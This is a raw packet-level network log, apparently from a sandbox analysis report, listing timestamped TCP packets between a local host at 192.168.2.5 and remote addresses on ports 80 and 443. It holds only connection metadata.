Oct 8, 2024 20:47:25.429790974 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.429824114 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.429840088 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.429853916 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.429878950 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.429888010 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.429898977 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.429920912 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.429954052 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.429961920 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.429989100 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.429996967 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.430037022 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.430205107 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.430237055 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.430254936 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.430270910 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.430275917 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.430304050 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.430336952 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.430346012 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.430368900 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.430398941 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.430402040 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.430418015 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.430438042 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.430471897 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.430479050 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.430504084 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.430526018 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.430536985 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.430572987 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.430581093 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.430625916 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.430682898 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.430713892 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.430722952 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.430747032 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.430779934 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.430789948 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.430814028 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.430824041 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.430851936 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.430867910 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.430886030 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.430896997 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.430929899 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.431063890 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.431117058 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.431152105 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.431159973 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.431195021 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.431231976 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.431263924 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.431277990 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.431298018 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.431310892 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.431332111 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.431339979 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.431380033 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.436156988 CEST	443	49791	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:25.436312914 CEST	443	49791	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:25.436382055 CEST	49791	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:25.436526060 CEST	49791	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:25.436526060 CEST	49791	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:25.436573029 CEST	443	49791	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:25.436599970 CEST	443	49791	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:25.439022064 CEST	49796	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:25.439117908 CEST	443	49796	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:25.439199924 CEST	49796	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:25.439333916 CEST	49796	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:25.439352036 CEST	443	49796	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:25.489294052 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.489316940 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.489331961 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.489345074 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.489346981 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.489357948 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.489371061 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.489383936 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.489406109 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.491202116 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.492511988 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.492552996 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.492558002 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.492569923 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.492594957 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.492674112 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.492686033 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.492697954 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.492711067 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.492711067 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.492738008 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.492758989 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.513845921 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.513907909 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.513936043 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.513972044 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.514008045 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.514017105 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.514027119 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.514070034 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.514117002 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.514127970 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.514151096 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.514163017 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.514188051 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.514195919 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.514225006 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.514233112 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.514262915 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.514270067 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.514309883 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.514370918 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.514401913 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.514417887 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.514436960 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.514446974 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.514473915 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.514483929 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.514503002 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.514518023 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.514538050 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.514553070 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.514575005 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.514590025 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.514607906 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.514615059 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.514645100 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.514652967 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.514678001 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.514688015 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.514724016 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.514731884 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.514766932 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.514776945 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.514801025 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.514807940 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.514833927 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.514844894 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.514868021 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.514878988 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.514903069 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.514914036 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.514946938 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.515059948 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.515132904 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.515167952 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.515175104 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.515182972 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.515218019 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.515253067 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.515266895 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.515285015 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.515292883 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.515319109 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.515331030 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.515352011 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.515362024 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.515397072 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.515410900 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.515453100 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.515598059 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.515630960 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.515646935 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.515665054 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.515670061 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.515697956 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.515707970 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.515731096 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.515744925 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.515764952 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.515779972 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.515798092 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.515808105 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.515835047 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.515836954 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.515872002 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.515877962 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.515904903 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.515918016 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.515938044 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.515948057 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.515970945 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.515980005 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.516005993 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.516012907 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.516041040 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.516047955 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.516072035 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.516079903 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.516102076 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.516114950 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.516134024 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.516146898 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.516169071 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.516177893 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.516202927 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.516211033 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.516237020 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.516237974 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.516268969 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.516278982 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.516308069 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.516313076 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.516360044 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.516439915 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.516473055 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.516494036 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.516508102 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.516540051 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.516571999 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.516571999 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.516606092 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.516612053 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.516632080 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.516638994 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.516649961 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.516673088 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.516681910 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.516706944 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.516722918 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.516740084 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.516746998 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.516773939 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.516783953 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.516803026 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.516815901 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.516835928 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.516846895 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.516870022 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.516875029 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.516912937 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.517126083 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.517160892 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.517175913 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.517195940 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.517205000 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.517231941 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.517235994 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.517265081 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.517272949 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.517299891 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.517307997 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.517333031 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.517342091 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.517365932 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.517370939 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.517399073 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.517405987 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.517431021 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.517436028 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.517463923 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.517472982 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.517496109 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.517508984 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.517530918 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.517566919 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.517566919 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.517618895 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.517790079 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.517822981 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.517838001 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.517858028 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.517865896 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.517890930 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.517899990 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.517925978 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.517935038 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.517961025 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.517968893 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.518007040 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.518018007 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.518049955 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.518064022 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.518084049 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.518090963 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.518115997 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.518126011 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.518148899 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.518157005 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.518181086 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.518192053 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.518217087 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.518219948 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.518249989 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.518265963 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.518285990 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.518290997 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.518327951 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.576327085 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.576353073 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.576366901 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.576380014 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.576392889 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.576405048 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.576411963 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.576419115 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.576450109 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.576482058 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.579902887 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.579946041 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.579948902 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.579989910 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.580008984 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.580020905 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.580050945 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.580063105 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.580094099 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.580106974 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.580116987 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.580132961 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.580137968 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.580158949 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.603272915 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.603327036 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.603329897 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.603363037 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.603368998 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.603423119 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.603456974 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.603462934 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.603482008 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.603491068 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.603528023 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.603540897 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.603574038 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.603892088 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.603924990 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.603941917 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.603960037 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.603970051 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.604000092 CEST	49755	80	192.168.2.5	95.164.90.97
